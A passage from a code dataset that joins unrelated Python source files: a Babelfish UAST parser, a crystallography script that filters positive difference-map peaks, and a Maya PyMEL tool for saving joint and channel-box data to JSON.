parent: Optional["Node"],
start: Optional[int],
end: Optional[int],
):
"""
Construct a Node (bblfsh.Node wrapper).
:param token: Token that the Node represents.
:param internal_type: Native type of the node. Formatting for formatting nodes.
:param roles: List of Babelfish roles.
:param parent: Parent of the node.
:param start: Starting offset of the node in the parsed file.
:param end: Ending offset of the node in the parsed file.
"""
self.token = token
self.internal_type = internal_type
self.roles = roles
self.parent = parent
self.start = start
self.end = end
def __repr__(self) -> str:
return (
f"Node(token={self.token}, "
f"internal_type={self.internal_type}, "
f"roles={self.roles}, "
f"parent={id(self.parent)}, "
f"start={self.start}, "
f"end={self.end})"
)
class Nodes(NamedTuple):
"""Utilities for lists of nodes."""
nodes: List[Node]
node_index: Dict[int, int]
token_indexes: List[int]
formatting_indexes: List[int]
def to_tree(self, file_content: str) -> Dict[str, Any]:
"""
Convert a list of nodes into a tree serializable by asdf.
:param file_content: Content of the file from which the nodes were extracted.
:return: Dictionary serializable by asdf.
"""
roles_offset = 0
roles_offsets = []
for node in self.nodes:
roles_offsets.append(roles_offset)
roles_offset += len(node.roles)
for node in self.nodes:
if node.internal_type == "WhiteSpace":
assert node.token.isspace()
return dict(
file_content=array([file_content], dtype=unicode_),
internal_types=array(
[node.internal_type for node in self.nodes], dtype=unicode_
),
roles_list=array(
[role for node in self.nodes for role in node.roles], dtype=unicode_
),
roles_offsets=array(roles_offsets, dtype=uint32),
parents=array(
[self.node_index.get(id(node.parent), -1) for node in self.nodes],
dtype=int32,
),
starts=array([node.start for node in self.nodes], dtype=uint32),
ends=array([node.end for node in self.nodes], dtype=uint32),
token_indexes=array(self.token_indexes, dtype=uint32),
formatting_indexes=array(self.formatting_indexes, dtype=uint32),
)
@staticmethod
def from_token_nodes(token_nodes: List[Node]) -> "Nodes":
all_nodes = []
seen: Set[int] = set()
for node in token_nodes:
current = node
while current is not None:
if id(current) not in seen:
seen.add(id(current))
all_nodes.append(current)
current = current.parent
node_to_index = {id(node): i for i, node in enumerate(all_nodes)}
token_node_indexes = [
node_to_index[id(token_node)] for token_node in token_nodes
]
formatting_indexes = [
node_to_index[id(token_node)]
for token_node in token_nodes
if token_node.internal_type == FORMATTING_INTERNAL_TYPE
]
return Nodes(
nodes=all_nodes,
node_index=node_to_index,
token_indexes=token_node_indexes,
formatting_indexes=formatting_indexes,
)
@staticmethod
def from_tree(tree: Dict[str, Any]) -> "Nodes":
"""
Convert an asdf tree into a list of nodes.
:param tree: Tree to convert.
:return: Nodes corresponding to the tree and the indexes of formatting nodes.
"""
file_content = tree["file_content"][0]
roles = []
previous_roles_offset = 0
for roles_offset in tree["roles_offsets"][1:]:
roles.append(tree["roles_list"][previous_roles_offset:roles_offset])
previous_roles_offset = roles_offset
if tree["roles_offsets"].shape[0]:
roles.append(tree["roles_list"][previous_roles_offset:])
all_nodes = []
token_indexes_set = frozenset(tree["token_indexes"])
for i, (start, end, internal_type, roles) in enumerate(
zip(tree["starts"], tree["ends"], tree["internal_types"], roles)
):
all_nodes.append(
Node(
start=int(start),
end=int(end),
roles=roles,
parent=None,
internal_type=internal_type,
token=file_content[start:end] if i in token_indexes_set else "",
)
)
for node, parent_index in zip(all_nodes, map(int, tree["parents"])):
node.parent = all_nodes[parent_index] if parent_index >= 0 else None
for node in all_nodes:
if node.internal_type == "WhiteSpace":
assert node.token.isspace()
node_index = {id(node): i for i, node in enumerate(all_nodes)}
return Nodes(
all_nodes,
node_index,
token_indexes=[int(i) for i in tree["token_indexes"]],
formatting_indexes=[int(i) for i in tree["formatting_indexes"]],
)
class BblfshNodeConverter:
"""Convert `BblfshNode`-s to `Node`-s (and handle bytes-unicode conversion)."""
def __init__(self, file_content: str, convert_to_utf8: bool):
"""Contruct a converter."""
self.file_content = file_content
self.convert_to_utf8 = convert_to_utf8
self.binary_to_str: Dict[int, int] = {}
current_offset = 0
for i, char in enumerate(self.file_content):
self.binary_to_str[current_offset] = i
current_offset += len(char.encode("utf-8", errors="replace"))
self.binary_to_str[current_offset] = len(self.file_content)
def bblfsh_node_to_node(
self, bblfsh_node: BblfshNode, parent: Optional[Node]
) -> Node:
"""Create a `Node` given a `BblfshNode` and an optional parent."""
position = bool(
bblfsh_node.start_position.offset or bblfsh_node.end_position.offset
)
if position:
start = bblfsh_node.start_position.offset
end = bblfsh_node.end_position.offset
if self.convert_to_utf8:
start = self.binary_to_str[start]
end = self.binary_to_str[end]
token = self.file_content[start:end]
else:
start = None
end = None
token = bblfsh_node.token
# Workaround https://github.com/bblfsh/javascript-driver/issues/65
if not token and bblfsh_node.internal_type == "StringLiteralTypeAnnotation":
token = bblfsh_node.properties["value"]
return Node(
token=token,
internal_type=bblfsh_node.internal_type,
roles=[role_name(role_id) for role_id in bblfsh_node.roles],
parent=parent,
start=start,
end=end,
)
class Parser:
"""Parse files into list of nodes."""
def __init_subclass__(
cls,
bblfsh_language: str,
reserved: List[str],
uast_fixers: Optional[Dict[str, Callable[[BblfshNode], None]]] = None,
convert_to_utf8: bool = True,
) -> None:
cls._bblfsh_language = bblfsh_language
cls._parser_reserved = re_compile(
"|".join(re_escape(i) for i in sorted(reserved, reverse=True))
)
cls._parser_space = re_compile(r"\s+")
cls._uast_fixers = uast_fixers if uast_fixers else {}
cls._convert_to_utf8 = convert_to_utf8
cls._logger = getLogger(cls.__name__)
def __init__(
self,
bblfshd_endpoint: str = environ.get("BBLFSHD_ENDPOINT", "0.0.0.0:9432"),
split_formatting: bool = False,
) -> None:
"""Construct a parser."""
for attr in [
"_bblfsh_language",
"_parser_reserved",
"_parser_space",
"_uast_fixers",
]:
if not hasattr(self, attr):
raise NotImplementedError(
f"The {self.__class__.__name__} is a base class and should not be "
"used directly."
)
self._bblfsh_client = BblfshClient(bblfshd_endpoint)
self._split_formatting = split_formatting
@property
def split_formatting(self) -> bool:
return self._split_formatting
def parse(self, repository_path: Path, file_path: Path) -> Nodes:
"""
Parse a file into a list of `Node`s.
:param repository_path: Path of the folder that contains the file to parse.
:param file_path: Path of the file to parse.
:return: List of parsed `Node`s.
"""
response = self._bblfsh_client.parse(
str(repository_path / file_path), language=self._bblfsh_language
)
if response.status != 0:
self._logger.warn(
"Could not process file %s, errors: %s",
file_path,
"; ".join(response.errors),
)
raise ParsingException(
f"Could not process file {file_path}, "
f"errors: {'; '.join(response.errors)}"
)
file_content = (repository_path / file_path).read_text(
encoding="utf-8", errors="replace"
)
bblfsh_node_converter = BblfshNodeConverter(
file_content, convert_to_utf8=self._convert_to_utf8
)
root_node = bblfsh_node_converter.bblfsh_node_to_node(response.uast, None)
to_visit = [(response.uast, root_node)]
non_formatting_tokens = []
while to_visit:
current_bblfsh_node, current_node = to_visit.pop()
if current_bblfsh_node.internal_type in self._uast_fixers:
current_bblfsh_node = self._uast_fixers[
current_bblfsh_node.internal_type
](current_bblfsh_node)
if current_bblfsh_node is None:
continue
to_visit.extend(
(
bblfsh_child,
bblfsh_node_converter.bblfsh_node_to_node(
bblfsh_child, current_node
),
)
for bblfsh_child in current_bblfsh_node.children
)
if (
current_node.token
and not current_bblfsh_node.children
and (current_node.start is not None and current_node.end is not None)
):
non_formatting_tokens.append(current_node)
sentinel = Node(
token=None,
internal_type="Sentinel",
roles=[],
parent=None,
start=len(file_content),
end=len(file_content),
)
non_formatting_tokens.append(sentinel)
pos = 0
tokens = []
for node in sorted(non_formatting_tokens, key=lambda n: n.start):
if node.start < pos:
continue
if node.start > pos:
sumlen = 0
diff = file_content[pos : node.start]
additional_nodes = []
for match in self._parser_reserved.finditer(diff):
token = match.group()
additional_nodes.append(
Node(
start=match.start() + pos,
end=match.end() + pos,
token=token,
parent=None,
internal_type=token.title(),
roles=[match.group().upper()],
)
)
sumlen += len(token)
for match in self._parser_space.finditer(diff):
token = match.group()
assert token.isspace()
additional_nodes.append(
Node(
start=match.start() + pos,
end=match.end() + pos,
token=token,
parent=None,
internal_type=FORMATTING_INTERNAL_TYPE,
roles=[FORMATTING_ROLE],
)
)
sumlen += len(token)
if sumlen != node.start - pos:
self._logger.warn(f"missed some imaginary tokens: {diff}")
raise ParsingException(f"missed some imaginary tokens: {diff}")
tokens.extend(sorted(additional_nodes, key=lambda n: n.start))
if node is sentinel:
break
tokens.append(node)
pos = node.end
tokens = self._augment_tokens(tokens)
closest_left_node = None
for i, token_node in enumerate(tokens):
if token_node.parent is not None:
closest_left_node = token_node
else:
found_parent = self._find_parent(i, tokens, closest_left_node)
token_node.parent = (
found_parent if found_parent is not None else root_node
)
if self._split_formatting:
tokens = self._perform_split_formatting(tokens)
reconstructed_file_content = "".join(node.token for node in tokens)
if file_content != reconstructed_file_content:
diff = "".join(
unified_diff(
file_content.splitlines(keepends=True),
reconstructed_file_content.splitlines(keepends=True),
fromfile="original",
tofile="reconstructed",
)
)
self._logger.warn("reconstructed file is not equal to original:\n%s", diff)
return Nodes.from_token_nodes(tokens)
def _augment_tokens(self, tokens: List[Node]) -> List[Node]:
augmented_tokens = []
if not tokens or tokens[0].internal_type != FORMATTING_INTERNAL_TYPE:
augmented_tokens.append(
Node(
start=0,
end=0,
token="",
parent=None,
internal_type=FORMATTING_INTERNAL_TYPE,
roles=[FORMATTING_ROLE],
)
)
if tokens:
augmented_tokens.append(tokens[0])
for previous_token, next_token in zip(
islice(tokens, 0, None), islice(tokens, 1, None)
):
assert previous_token.end == next_token.start
if (
previous_token.internal_type != FORMATTING_INTERNAL_TYPE
and next_token.internal_type != FORMATTING_INTERNAL_TYPE
):
augmented_tokens.append(
Node(
start=previous_token.end,
end=previous_token.end,
token="",
parent=None,
internal_type=FORMATTING_INTERNAL_TYPE,
roles=[FORMATTING_ROLE],
)
)
augmented_tokens.append(next_token)
if tokens and tokens[-1].internal_type != FORMATTING_INTERNAL_TYPE:
augmented_tokens.append(
Node(
start=tokens[-1].end,
end=tokens[-1].end,
token="",
parent=None,
internal_type=FORMATTING_INTERNAL_TYPE,
roles=[FORMATTING_ROLE],
)
)
return augmented_tokens
@staticmethod
def _find_parent(
node_index: int, nodes: List[Node], closest_left_node: Optional[Node]
) -> Optional[Node]:
"""
Compute a node's parent as the LCA of the closest left and right nodes.
:param node_index: Index of the node for which to find a parent.
:param nodes: Sequence of token `Node`-s.
:param closest_left_node: Closest node on the left with a true parent.
:return: The Node of the found parent or None if no parent was found.
"""
if closest_left_node is None:
return None
left_ancestor_ids = set()
current_left_ancestor = closest_left_node.parent
while current_left_ancestor is not None:
left_ancestor_ids.add(id(current_left_ancestor))
current_left_ancestor = current_left_ancestor.parent
for future_node in nodes[node_index + 1 :]:
if future_node.parent is not None:
break
else:
return None
current_right_ancestor = future_node.parent
while current_right_ancestor is not None:
if id(current_right_ancestor) in left_ancestor_ids:
return current_right_ancestor
current_right_ancestor = current_right_ancestor.parent
return None
def _perform_split_formatting(self, nodes: List[Node]) -> List[Node]:
"""
Split each formatting node into a list of one node per character.
:param nodes: Sequence of token `Node`-s.
:return: The new sequence, with split formatting nodes.
"""
new_nodes = []
for node in nodes:
if node.internal_type == FORMATTING_INTERNAL_TYPE and node.token:
for i, char in enumerate(node.token):
new_nodes.append(
Node(
token=char,
internal_type=node.internal_type,
roles=node.roles,
parent=node.parent,
start=node.start + i,
end=node.start + i + 1,
)
)
else:
new_nodes.append(node)
return new_nodes
def __del__(self) -> None:
if self._bblfsh_client:
self._bblfsh_client._channel.close()
self._bblfsh_client._channel = self._bblfsh_client._stub = None
| [
"142691+m09@users.noreply.github.com"
] | 142691+m09@users.noreply.github.com |
69484baf224d613ae89357045b4d223942efb5f2 | 06e8f017c2a20a1b816997f095ce81c9e123465c | /peak_searching/lib/positive_diff_peak_remover.py | fff93b767810850948c9659f74d54cfdae5590ec | [] | no_license | charliebury/garmanwork | 14a9357d9f7f81373423811be714b39ec1f51fa3 | df665c5b6f3445653aa0cd11c610561175fda48f | refs/heads/master | 2020-04-16T02:01:06.639127 | 2015-03-01T19:42:18 | 2015-03-01T19:42:18 | 28,575,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,331 | py | # -*- coding: utf-8 -*-
"""
Created on Sun Nov 23 23:35:57 2014
@author: charlie
"""
from termcolor import colored
import sys
######################################################################################################################################################
######################################################################################################################################################
#SECTION: REMOVE POSITIVE DIFFERENCE MAP PEAKS
######################################################################################################################################################
######################################################################################################################################################
def positive_diff_peak_remover(filelist,datedir):
pdbfilename = filelist[1]
hafilename = filelist[2]
################################################################################
#input file names for .pdb and .ha files (outputted by FFT) from which the
#positive peaks should be removed automatically
pdbin = open(str(pdbfilename), "r" )
hain = open(str(hafilename), "r" )
pdblines = pdbin.readlines()
halines = hain.readlines()
#writes a new .pdb and .ha file containing ONLY negative difference map peaks
#and places it in the directory created above
newfilepdb = open(datedir.path +'/'+"negpeaksonly"+datedir.date+".pdb", "w")
newfileha = open(datedir.path +'/'+"negpeaksonly"+datedir.date+".ha", "w")
#reads through the .pdb and .ha files and removes positive peaks, whilst
#keeping the necessary preamble at the top of each file type to allow them to
#be read
counter_pdb = 0
for line in pdblines:
if 'ATOM' not in line[0:5]:
newfilepdb.write(line)
elif 'ATOM' in line[0:5]:
if float(line[54:60]) <= 0:
newfilepdb.write(line)
counter_pdb += 1
else:
pass
print '#'+ ' '*5 + 'Type' + ' '*10 + 'Sigma' + ' '*11 + 'Status'
counter = 0
line_counter = 0
for line in halines:
if 'ATOM' not in line[0:4]:
newfileha.write(line)
elif 'ATOM' in line[0:4]:
line_counter += 1
if float(line.split()[5]) <= 0:
counter+=1
print str(line_counter) + ': ' + colored('Negative','red') + ' @ ' + colored(str(float(line.split()[5])),'blue') + ' ----> ' + 'kept'
newfileha.write(line)
else:
print str(line_counter) + ': ' + colored('Positive','green') + ' @ ' + colored(str(float(line.split()[5])),'blue') + ' ----> ' + 'removed'
# as a check, determine whether diff peak pdb and ha files contain same number of neg peaks
if counter != counter_pdb:
print 'Incompatible .pdb and .ha files.. different numbers of negative peaks detected'
print '---> Terminating script...'
sys.exit()
print 'Breakdown summary: ' + str(counter) + ' negative peaks found in current file.'
pdbin.close()
hain.close()
newfilepdb.close()
newfileha.close()
return counter
############################################################################### | [
"csbury@me.com"
] | csbury@me.com |
8e8638190f9f4e57c66537cf4152141a91fe3c67 | 8a045d3c5437fbb7138a028745464149d6b8c217 | /animation/helper.py | cb12b878dd659bd2f1ff7659e3914c9b521e3b2b | [
"MIT"
] | permissive | jzboylxj/XDLibs | 14b10329683517762dc75a72694a16c856b1b88f | 76ab640502d7e254bc98930d6ebb9e870476ed9a | refs/heads/master | 2023-03-24T02:09:32.575609 | 2021-03-11T02:14:50 | 2021-03-11T02:14:50 | 279,275,167 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 105,941 | py | # coding=utf-8
"""
JSON数据管理工具
"""
import json
import os
from imp import reload
from animation import common
from animation import test_node
from pymel import core as pm
reload(common)
reload(test_node)
version = 0.2
def str_to_list(str):
"""
解析字符串,将字符串转换成列表
:param str: 需要解析的字符串
:return: List
"""
str_list = str.split(";")
str_list = [x.strip() for x in str_list if x.strip() != '']
return str_list
def list_to_str(data=None):
"""
解析列表,将所有的成员转换成列表,中间用空格分隔开
:param data: 需要解析的字符串
:return: string
"""
if data is None:
data = []
str_data = ""
for item in data:
str_data = str_data + " " + item
return str_data.strip()
def zero_locator(name):
"""
创建一个通道栏属性全部锁定并隐藏的locator
:param name: Locator的名字
:return: Locator
"""
locator = pm.spaceLocator(name=name, p=[0, 0, 0])
for attr in ["tx", "ty", "tz",
"rx", "ry", "rz",
"sx", "sy", "sz",
"v"]:
pm.setAttr("%s.%s" % (name, attr), lock=True, k=False, cb=False)
return locator
def position_joint(jnt_name, value=None):
"""
将指定骨骼移动到指定位置
:param jnt_name: 指定骨骼的名字
:param value: 骨骼的位置参数(list)
:return: None
"""
if value is None:
value = [0, 0, 0, 0, 0, 0, 1, 1, 1]
pm.PyNode(jnt_name).translateX.set(value[0])
pm.PyNode(jnt_name).translateY.set(value[1])
pm.PyNode(jnt_name).translateZ.set(value[2])
pm.PyNode(jnt_name).rotateX.set(value[3])
pm.PyNode(jnt_name).rotateY.set(value[4])
pm.PyNode(jnt_name).rotateZ.set(value[5])
pm.PyNode(jnt_name).scaleX.set(value[6])
pm.PyNode(jnt_name).scaleY.set(value[7])
pm.PyNode(jnt_name).scaleZ.set(value[8])
return
class ChannelBoxSaver(common.Singleton):
"""
通道栏属性保存工具
获取选择对象的通道栏里面的属性值后,转换成字典写入一个json文件里面
"""
def __init__(self):
super(ChannelBoxSaver, self).__init__()
self.slider_mode = 1
self.output_path = ''
self.dict_data = {}
self.initialize()
def initialize(self):
if pm.optionVar(q='doChannelBoxSavePath'):
self.output_path = pm.optionVar(
q='doChannelBoxSavePath')
if pm.optionVar(q='sliderWokeMode'):
self.slider_mode = int(pm.optionVar(
q='sliderWokeMode'))
def show(self):
if pm.window("channelBoxSaver", ex=True):
pm.deleteUI("channelBoxSaver")
pm.window(
"channelBoxSaver",
title=u"Json数据备份工具 Ver %s" % version,
closeCommand=lambda *args: self._closed_window_cmd())
form_layout = pm.formLayout()
dict_layout = pm.frameLayout(mh=5, mw=10, label=u"定义数据", bgs=True)
pm.radioButtonGrp(
"sliderWokeMode",
label=u'工作模式:',
labelArray2=[u'滑竿(多项)', u'单项'],
cw3=[60, 100, 100],
sl=self.slider_mode,
cc=lambda *args: self.change_slider(),
numberOfRadioButtons=2)
pm.textScrollList("dataExportList", ams=True)
pm.popupMenu()
pm.menuItem(
label=u"添加场景中的选择对象",
c=lambda *args: self.add_slider())
pm.menuItem(
label=u"从列表中移除选择对象",
# c=lambda *args: self.add_slider_key("sliderY", "sliderKeyList")
)
pm.menuItem(
label=u"从列表中移除所有对象",
c=lambda *args: self.clean_list()
)
pm.setParent("..")
file_layout = pm.frameLayout(mh=5, mw=10, label=u"定义输出", bgs=True)
pm.columnLayout(adj=1, rs=10)
pm.textFieldButtonGrp(
"channelBoxSavePathInput",
label=u"保存路径",
bl=u"选择地址",
adj=2,
cw3=[55, 100, 60],
text=self.output_path,
bc=lambda *args: self._set_output_path())
pm.setParent("..")
pm.button(label=u"保存", c=lambda *args: self.map_channel_box())
pm.setParent("..")
pm.formLayout(
form_layout, edit=True,
attachForm=[
(dict_layout, 'top', 10),
(dict_layout, 'left', 10),
(dict_layout, 'right', 10),
(file_layout, 'left', 10),
(file_layout, 'right', 10),
(file_layout, 'bottom', 10),
],
attachControl=[
(dict_layout, 'bottom', 5, file_layout),
],
)
pm.showWindow("channelBoxSaver")
def change_slider(self):
self.slider_mode = pm.radioButtonGrp("sliderWokeMode", q=True, sl=True)
return
def add_slider(self):
for item in pm.ls(sl=True):
if (item not in pm.textScrollList(
"dataExportList", q=True, ai=True)):
pm.textScrollList("dataExportList", e=True, a=item)
# print pm.textScrollList("dataExportList", q=True, ai=True)
def clean_list(self):
pm.textScrollList("dataExportList", e=True, ra=True)
def _get_slider(self):
select_slider = pm.ls(sl=True)[0]
pm.textFieldButtonGrp("sliderGetBtn", e=True, text=select_slider)
current_sliders = pm.textScrollList("sliderKeyList", q=True, ai=True)
slider_attrs = pm.listAttr(select_slider, k=True)
for slider_attr in slider_attrs:
if select_slider not in current_sliders:
pm.textScrollList("sliderKeyList", e=True, a=slider_attr)
for item in pm.textScrollList("sliderKeyList", q=True, ai=True):
self.dict_data[item] = dict()
return
def _select_slider(self):
current_select = pm.textScrollList("sliderKeyList", q=True, si=True)[0]
# print(current_select)
pm.textScrollList("rangeKeyList", e=True, ra=True)
pm.textScrollList(
"rangeKeyList", e=True, a=self.dict_data[current_select].keys())
pm.textScrollList("jointKeyList", e=True, ra=True)
return
def _select_range(self):
current_slider = pm.textScrollList("sliderKeyList", q=True, si=True)[0]
current_range = pm.textScrollList("rangeKeyList", q=True, si=True)[0]
# print("%s.%s" % (current_slider, current_range))
pm.textScrollList("jointKeyList", e=True, ra=True)
pm.textScrollList(
"jointKeyList",
e=True,
a=self.dict_data[current_slider][current_range].keys())
return
def _select_joints(self):
pm.select(pm.textScrollList("jointKeyList", q=True, si=True))
def add_range_field(self, field, scroll_list):
current_slider = pm.textScrollList("sliderKeyList", q=True, si=True)[0]
if not self._check_field_exists(field, scroll_list):
pm.textScrollList(scroll_list, e=True, a=[field])
self.dict_data[current_slider][field] = dict()
def _append_joints(self):
current_slider = pm.textScrollList("sliderKeyList", q=True, si=True)[0]
current_range = pm.textScrollList("rangeKeyList", q=True, si=True)[0]
current_joints = pm.textScrollList("jointKeyList", q=True, ai=True)
for jnt in pm.ls(sl=True):
if jnt not in current_joints:
pm.textScrollList("jointKeyList", e=True, a=jnt)
jnt_value = [
round(jnt.translateX.get() * 0.01, 5),
round(jnt.translateY.get() * 0.01, 5),
round(jnt.translateZ.get() * 0.01, 5),
round(jnt.rotateX.get(), 5),
round(jnt.rotateY.get(), 5),
round(jnt.rotateZ.get(), 5),
round(jnt.scaleX.get(), 5),
round(jnt.scaleY.get(), 5),
round(jnt.scaleZ.get(), 5),
]
self.dict_data[
current_slider][current_range][jnt.controller_name()] = jnt_value
return
def _check_field_exists(self, field, scroll_list):
scroll_list = pm.textScrollList(scroll_list, q=True, ai=True)
if field in scroll_list:
return True
else:
return False
def add_slider_key(self, slider, scroll_list):
if not self._check_field_exists(slider, scroll_list):
pm.textScrollList(scroll_list, e=True, a=slider)
for item in pm.textScrollList(scroll_list, q=True, ai=True):
self.dict_data[item] = dict()
return
def _set_output_path(self):
output_path = pm.fileDialog2(
dialogStyle=2,
fileFilter="JSON File (*.json);;",
fileMode=3, okc=u"选择文件夹")
if output_path:
pm.textFieldButtonGrp(
"channelBoxSavePathInput", e=True,
text=output_path[0])
self.output_path = output_path[0]
return
def parse_str(self, str_data):
str_list = str_data.split(";")
str_list = [x.strip() for x in str_list if x.strip() != '']
return str_list
def joint_cb_list(self, item):
jnt_value = [
round(pm.PyNode(item).translateX.get() * 0.01, 5),
round(pm.PyNode(item).translateY.get() * 0.01, 5),
round(pm.PyNode(item).translateZ.get() * 0.01, 5),
round(pm.PyNode(item).rotateX.get(), 5),
round(pm.PyNode(item).rotateY.get(), 5),
round(pm.PyNode(item).rotateZ.get(), 5),
round(pm.PyNode(item).scaleX.get(), 5),
round(pm.PyNode(item).scaleY.get(), 5),
round(pm.PyNode(item).scaleZ.get(), 5),
]
return jnt_value
def get_joint_data(self, controller, slider):
jnt_str = ""
if slider == "sliderX":
jnt_str = "jointsX"
if slider == "sliderY":
jnt_str = "jointsY"
if slider == "sliderZ":
jnt_str = "jointsZ"
for item in self.parse_str(
pm.getAttr("%s.%s" % (controller, jnt_str))):
# print item
self.dict_data[slider][item] = dict()
pm.setAttr("%s.%s" % (controller, slider), 1)
self.dict_data[slider][item]["max"] = self.joint_cb_list(item)
if pm.radioButtonGrp("sliderWokeMode", q=True, sl=True) == 1:
pm.setAttr("%s.%s" % (controller, slider), -1)
self.dict_data[slider][item]["min"] = self.joint_cb_list(item)
pm.setAttr("%s.%s" % (controller, slider), 0)
def map_channel_box(self):
"""
获取选择对象通道栏里面的属性值后,转换成字典
:return:
"""
controller_list = pm.textScrollList("dataExportList", q=True, ai=True)
for controller in controller_list:
self.dict_data = {}
if pm.attributeQuery('sliderX', node=controller, ex=True):
self.dict_data['sliderX'] = dict()
# 设置控制器的属性为1,这个也是max状态
self.get_joint_data(controller, 'sliderX')
if pm.attributeQuery('sliderY', node=controller, ex=True):
self.dict_data["sliderY"] = dict()
self.get_joint_data(controller, 'sliderY')
if pm.attributeQuery('sliderZ', node=controller, ex=True):
self.dict_data["sliderZ"] = dict()
self.get_joint_data(controller, 'sliderZ')
folder = pm.textFieldButtonGrp(
"channelBoxSavePathInput", q=True, text=True)
json_name = ("%s/%s.json" % (folder, controller))
common.write_json(dict_data=self.dict_data, file_path=json_name)
print(u"%s 转化完毕" % controller)
return
def _closed_window_cmd(self):
pm.optionVar(sv=('doChannelBoxSavePath', self.output_path))
pm.optionVar(sv=('sliderWokeMode', self.slider_mode))
class CustomAttrHelper(common.Singleton):
"""
管理自定义控制器的自定义属性的窗口工具
"""
def __init__(self):
super(CustomAttrHelper, self).__init__()
self.initialize()
self.show()
def initialize(self):
pass
def show(self):
if pm.window("customAttrHelper", q=True, ex=True):
pm.deleteUI("customAttrHelper")
pm.window("customAttrHelper", title="Custom Attr Helper")
self.main_form = pm.formLayout()
self.frame_layout = pm.frameLayout(
label="Custom Attr Helper", bgs=True)
self.form_layout = pm.formLayout()
self.controller_field = pm.textFieldButtonGrp(
"customControllerGetter",
label=u"控制器名称:",
bl=u" Get ",
cw3=[75, 70, 70],
adj=2,
bc=lambda *args: self.get_custom_controller())
self.select_controller_btn = pm.button(
label=u"选择控制器",
c=lambda *args: self.select_controller())
self.controller_attr_options = pm.radioButtonGrp(
"customControllerAttrOptions",
label=u'控制器属性:',
labelArray3=['jointsX', 'jointsY', 'jointsZ'],
cw4=[75, 70, 70, 70],
sl=1,
numberOfRadioButtons=3,
cc=lambda *args: self.select_radio_item())
self.add_joint_btn = pm.button(
label=u"添加影响骨骼",
c=lambda *args: self.joint_string_value())
self.text_scroll = pm.textScrollList(ams=True)
pm.popupMenu()
pm.menuItem(label=u"选择所选",
c=lambda *args: self.select_item())
pm.formLayout(
self.form_layout,
edit=True,
attachForm=[
(self.controller_field, 'top', 10),
(self.controller_field, 'left', 10),
(self.select_controller_btn, 'top', 10),
(self.select_controller_btn, 'right', 10),
(self.controller_attr_options, 'left', 10),
(self.controller_attr_options, 'right', 10),
(self.add_joint_btn, 'left', 10),
(self.add_joint_btn, 'right', 10),
(self.text_scroll, 'left', 10),
(self.text_scroll, 'right', 10),
(self.text_scroll, 'bottom', 10)
],
attachControl=[
(
self.controller_field, 'right', 5,
self.select_controller_btn),
(
self.controller_attr_options, 'top', 5,
self.controller_field),
(self.add_joint_btn, 'top', 5, self.controller_attr_options),
(self.text_scroll, 'top', 5, self.add_joint_btn),
],
)
pm.setParent("..") # end of formLayout
pm.setParent("..") # end of frameLayout
pm.formLayout(
self.main_form,
edit=True,
attachForm=[
(self.frame_layout, 'top', 10),
(self.frame_layout, 'left', 10),
(self.frame_layout, 'bottom', 10),
(self.frame_layout, 'right', 10),
],
attachControl=[
# (self.controller_field, 'right', 5,
# self.select_controller_btn),
],
)
pm.showWindow("customAttrHelper")
def _closed_window_cmd(self):
pass
def select_item(self):
joint_list = pm.textScrollList(self.text_scroll, q=True, si=True)
pm.select(joint_list)
return joint_list
def select_controller(self):
pm.select(
pm.textFieldButtonGrp(self.controller_field, q=True, text=True)
)
return
def select_radio_item(self):
label_array = ['jointsX', 'jointsY', 'jointsZ']
radio_index = pm.radioButtonGrp(
"customControllerAttrOptions", q=True, sl=True)
controller_name = pm.textFieldButtonGrp(
"customControllerGetter", q=True, text=True)
select_attr = label_array[radio_index - 1]
if pm.PyNode(controller_name).hasAttr(select_attr):
joint_list = str_to_list(
pm.getAttr("%s.%s" % (controller_name, select_attr)))
pm.textScrollList(self.text_scroll, e=True, ra=True)
pm.textScrollList(self.text_scroll, e=True, a=joint_list)
else:
pm.textScrollList(self.text_scroll, e=True, ra=True)
def joint_string_value(self):
index = pm.radioButtonGrp(
"customControllerAttrOptions", q=True, sl=True)
controller = pm.textFieldButtonGrp(
"customControllerGetter", q=True, text=True)
sel_joints = pm.ls(sl=True)
name = ""
for item in sel_joints:
name = name + item.controller_name() + ";"
attr_name = ""
if index == 1:
attr_name = "jointsX"
elif index == 2:
attr_name = "jointsY"
elif index == 3:
attr_name = "jointsZ"
pm.setAttr(("%s.%s" % (controller, attr_name)), name, type="string")
pm.textScrollList(self.text_scroll, e=True, a=sel_joints)
return
def get_custom_controller(self):
attr_list = ['jointsX', 'jointsY', 'jointsZ']
controller_name = pm.ls(sl=True)[0].controller_name()
pm.textFieldButtonGrp(
"customControllerGetter",
e=True,
text=controller_name)
# print(controller_name)
select_index = pm.radioButtonGrp(
"customControllerAttrOptions", q=True, sl=True)
select_attr = attr_list[select_index - 1]
if pm.PyNode(controller_name).hasAttr(select_attr):
joint_list = str_to_list(
pm.getAttr("%s.%s" % (controller_name, select_attr)))
pm.textScrollList(self.text_scroll, e=True, ra=True)
pm.textScrollList(self.text_scroll, e=True, a=joint_list)
return
class ChannelBoxWriter(common.Singleton):
def __init__(self):
super(ChannelBoxWriter, self).__init__()
self.json_folder = ''
self.json_files = []
self.initialize()
self.show()
def initialize(self):
if pm.optionVar(q='arFaceControllerJsonFolder'):
self.json_folder = pm.optionVar(
q='arFaceControllerJsonFolder')
self.json_files = self.scanning_folder()
# print self.json_files
def show(self):
if pm.window("arFaceController", ex=True):
pm.deleteUI("arFaceController")
pm.window(
"arFaceController",
mb=True,
cc=lambda *args: self._closed_window_cmd())
self.menu_list()
form_layout = pm.formLayout()
json_layout = self.json_controller_widget()
pm.formLayout(
form_layout, edit=True,
attachForm=[
(json_layout, 'left', 10),
(json_layout, 'right', 10),
],
attachControl=[
# (dict_layout, 'bottom', 5, file_layout),
],
)
pm.showWindow("arFaceController")
def menu_list(self):
"""
工具菜单栏
"""
pm.menu(label=u"设置", tearOff=True)
pm.menuItem(
label=u"设置Json存放目录",
c=lambda *args: self.setting_json_folder())
pm.menuItem(
label=u"调试模式", cb=False)
def json_controller_widget(self):
layout = pm.frameLayout(
"controllerOptionsLayout",
label=u"Json数据管理", mw=10, mh=5, bgs=True)
pm.radioButtonGrp(
label=u"工作模式",
numberOfRadioButtons=2,
cw3=[50, 50, 50],
sl=1,
labelArray2=[u'创建', u'测试'])
self.option_menu_widget()
# 这里是程序添加空间的地方
self.selected_controller()
pm.setParent("..")
return layout
def option_menu_widget(self):
if pm.optionMenuGrp("controllerOptionsWidget", ex=True):
pm.deleteUI("controllerOptionsWidget")
pm.optionMenuGrp(
"controllerOptionsWidget",
parent="controllerOptionsLayout",
label=u"Controller",
